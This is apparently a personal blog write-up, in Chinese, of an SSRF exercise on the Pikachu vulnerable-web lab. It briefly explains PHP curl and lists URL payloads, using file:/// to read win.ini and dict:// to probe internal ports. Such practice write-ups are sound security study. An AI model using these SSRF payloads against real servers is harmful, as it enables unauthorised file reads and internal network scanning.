pikachu

SSRF

CURL

0x01

先来了解一下curl

PHP支持的由Daniel Stenberg创建的libcurl库允许你与各种的服务器使用各种类型的协议进行连接和通讯。

libcurl目前支持http、https、ftp、gopher、telnet、dict、file和ldap协议。libcurl同时也支持HTTPS认证、HTTP POST、HTTP PUT、 FTP 上传(这个也能通过PHP的FTP扩展完成)、HTTP 基于表单的上传、代理、cookies和用户名+密码的认证。

PHP中使用cURL实现Get和Post请求的方法

这些函数在PHP 4.0.2中被引入。

0x02

利用file协议,读取任意文件

http://192.168.87.166/pikachu/vul/ssrf/ssrf_curl.php?url=file:///c:/windows/win.ini#

image-20231130002234080

0x03

dict协议扫描内网主机开放端口

url=dict://192.168.198.1:21

0x04

直接访问指定的url

url=www.baidu.com

image-20231130002620090

file_get_content

0x01

使用file

file:///c:/windows/win.ini

0x02

http

file=http://www.baidu.com

image-20231130003053296

#靶场记录
pikachu
https://tsy244.github.io/2023/11/30/靶场记录/pikachu/
Author
August Rosenberg
Posted on
November 30, 2023
Licensed under